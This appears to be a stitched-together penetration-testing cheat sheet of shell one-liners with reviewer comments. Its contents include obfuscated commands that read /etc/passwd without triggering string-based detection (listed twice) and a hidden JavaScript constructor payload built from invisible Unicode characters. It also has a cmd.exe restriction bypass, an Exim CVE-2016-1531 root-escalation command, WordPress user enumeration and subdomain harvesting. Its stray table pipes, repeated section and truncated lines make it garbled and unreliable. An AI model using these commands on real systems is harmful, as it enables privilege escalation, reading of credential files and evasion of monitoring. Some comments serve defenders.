#Obfuscating calls to dump /etc/passwd
# Each line reads the file without the literal string "/etc/passwd" appearing
# on the command line, so detections keyed on that string or on a specific
# binary name will not match. Defensive takeaway: alert on the file that is
# actually opened (for example an audit watch on the path), not on
# command-line text.
#
# awk with an always-true pattern prints every input line. stdin is redirected
# from a glob: "?" matches any single character and "[Cc]" matches C or c, so
# the pattern is meant to expand to /etc/passwd. This depends on the shell
# applying pathname expansion to a redirection target, which not every sh does.
awk '1==1' </?t[Cc]/????wd
# tr a a maps "a" to itself, so stdin is copied through unchanged; p*wd is a
# glob resolved relative to /etc after the cd.
cd /etc;tr a a< p*wd
# The sed script uses "s" as the delimiter of the s command, so it is
# equivalent to s/:/|/g (every ":" becomes "|").
# NOTE(review): the leading backtick is unmatched and no input is given, so
# this line looks truncated.
`sed 'ss:s|sg'
| []["filter"]["constructor"](unescape(escape('󠅡󠅬󠅥').replace(/u.{8}/g,'')))() |
# Token frequency count for ciphertext.txt: tr puts each space-separated token
# on its own line, sort | uniq -c counts duplicates, awk re-emits
# "count token" with a single space, column aligns the two fields, and the
# final sort -nr lists the most frequent tokens first.
| cat ciphertext.txt | tr ' ' '\n' | sort | uniq -c | awk '{print $1" "$2}' | column -c3 -s " " -t | sort -nr |
# Recursive mirror of a site. -r/-m turn on recursion and mirroring, -np stops
# wget from ascending above the starting directory, -e robots=off makes it
# ignore robots.txt, and --timeout=1 --tries=3 --retry-connrefused bound how
# long each request is retried.
| wget -r -np -m -e robots=off --timeout=1 --tries=3 --retry-connrefused http://domain.tld |
| # thanks to - https://twitter.com/mwulftange/status/1034689855010353152 | |
| If you're not allowed to run cmd.exe interactively but `cmd /c …` works, this `cmd /c` based REPL may be helpful: | |
| cmd /c for /l %i in (0,0,1) do cmd /c "set /p C=^> & cmd /c %C%" |
# Top 20 most-used commands from shell history. awk tallies field 2 (the
# command word, assuming the usual "number command ..." history layout) and
# prints count, percentage of all entries and the command. grep -v "./" drops
# every row that contains any character followed by "/", column aligns the
# fields, sort -nr orders by count, nl numbers the rows, head keeps 20.
| history | awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a; }' | grep -v "./" | column -c3 -s " " -t | sort -nr | nl | head -n20 |
#Obfuscating calls to dump /etc/passwd
# None of these command lines contains the literal string "/etc/passwd", so a
# filter or detection that matches on that string, or on one particular
# binary, misses them. Monitoring should key on the file that gets opened
# (for example an audit watch on the path) rather than on command-line text.
#
# awk '1==1' is an always-true pattern, so every input line is printed; the
# input comes from a redirection whose target is a glob ("?" = any one
# character, "[Cc]" = C or c) intended to expand to /etc/passwd. Not every sh
# performs pathname expansion on redirection targets.
awk '1==1' </?t[Cc]/????wd
# tr a a translates "a" to "a", i.e. passes stdin through untouched; the glob
# p*wd is resolved inside /etc because of the preceding cd.
cd /etc;tr a a< p*wd
# sed accepts any character as the s-command delimiter; with "s" as the
# delimiter this script is the same as s/:/|/g.
# NOTE(review): the backtick at the start is never closed and no input file is
# shown, so the line appears to be cut off.
`sed 'ss:s|sg'
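Exim < 4.86.2 local root privilege escalation (CVE-2016-1531, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531). The issue applies when Exim is installed setuid root and uses perl_startup: the caller's environment reaches the Perl interpreter. Upgrading to 4.86.2 or later, which cleans the environment by default (see the `keep_environment` and `add_environment` options), closes it.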
[user@server ~]$ whoami
admin
[user@server ~]$ id
uid=501(admin) gid=502(admin) groups=502(admin)
[user@server ~]$ PERL5OPT="-d/dev/null" /usr/sbin/exim -ps user@server
| examplesite.com/wp-json/wp/v2/users |
| # Grab from crt.sh | |
# Both lookups below query public Certificate Transparency data: any hostname
# placed in a publicly trusted certificate can be listed this way, which also
# makes the same query useful for inventorying your own domains.
# xargs -I substitutes the domain into the URL, jq pulls the name fields, the
# two sed calls strip double quotes and "*." wildcard prefixes, and sort -u
# de-duplicates.
| echo "targetdomain.com" | xargs -I testdomain curl -s "https://crt.sh/?q=%.testdomain&output=json" | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | |
| # Grab from certspotter.com | |
| echo "targetdomain.com" | xargs -I testdomain curl -s https://certspotter.com/api/v0/certs\?domain\=testdomain | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | |
| # Enumerate hosts from SSL Certificate | |
# Prints the DNS entries (subject alternative names) of the certificate the
# server presents. The leading "echo |" closes s_client's stdin so it exits
# after the handshake.
# NOTE(review): openssl s_client -connect takes host:port; the "https://"
# prefix is not part of that syntax and should be dropped — confirm.
| echo | openssl s_client -connect https://targetdomain.com:443 | openssl x509 -noout -text | grep DNS |
# Shortcuts that print the default gateway, the interface of the default
# route, and the global-scope IPv4 address with its prefix length.
# The gateway and interface come from the route -n row flagged "UG"
# (columns 2 and 8); the address is column 4 of `ip -o -f inet addr show`.
# NOTE(review): the alias bodies are double-quoted, so each $(...) runs once,
# when the alias is defined, and the alias then prints that stored value even
# after the network configuration changes; single quotes would defer the
# lookup to each use. `print` is a ksh/zsh builtin and is not available in bash.
| alias mygateway="print $(route -n | grep 'UG[ \t]' | awk '{print $2}')" | |
| alias myinterface="print $(route -n | grep 'UG[ \t]' | awk '{print $8}')" | |
| alias mysubnet="print $(ip -o -f inet addr show | awk '/scope global/ {print $4}')" |